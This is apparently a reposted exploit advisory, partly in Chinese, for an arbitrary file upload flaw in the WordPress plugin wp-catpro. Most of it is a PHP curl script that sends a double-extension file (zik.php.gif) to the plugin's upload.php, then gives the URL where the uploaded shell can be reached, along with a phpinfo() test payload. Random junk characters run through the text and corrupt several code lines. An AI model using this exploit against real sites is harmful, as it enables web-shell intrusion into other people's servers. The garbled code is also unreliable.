WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

3 }) v* I1 v. i- x2 f) K作者  => Zikou-16
1 M' r' x3 t  \* J, Z+ y邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
7 a" ^# K5 E0 d) ~* u8 K# ?# o9 y- s. H下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
' ]* W. c  y9 t# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
, ?. v7 y- |- M+ i# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
6 P3 ^! T# E; E+ d9 U
5 L9 g) k0 [! Y" o0 U' K. p#=> Exploit
4 Q, T6 h. b# ]-----------
<?php

. B; L! R4 F+ P6 G$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
0 w+ f5 d$ E* s8 A% \6 A: jcurl_setopt($ch, CURLOPT_POSTFIELDS,
7 A( ~9 N8 N$ darray('Filedata'=>"@$uploadfile",
, s" y( ?9 e- L5 b'folder'=>'/wp-content/uploads/catpro/'));
; |5 D. C7 Y/ Ccurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
  g4 K$ M7 _. P" y0 \$ acurl_close($ch);
9 M: l; N9 D' j+ R! x
: U9 o& g6 ]9 |# D; b8 _- Xprint "$postResult";
0 k9 ?# \! W# H5 x3 x
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
8 K1 B8 C$ m5 f; ^# d. C* vphpinfo();
* v( v) n6 H2 k' F?>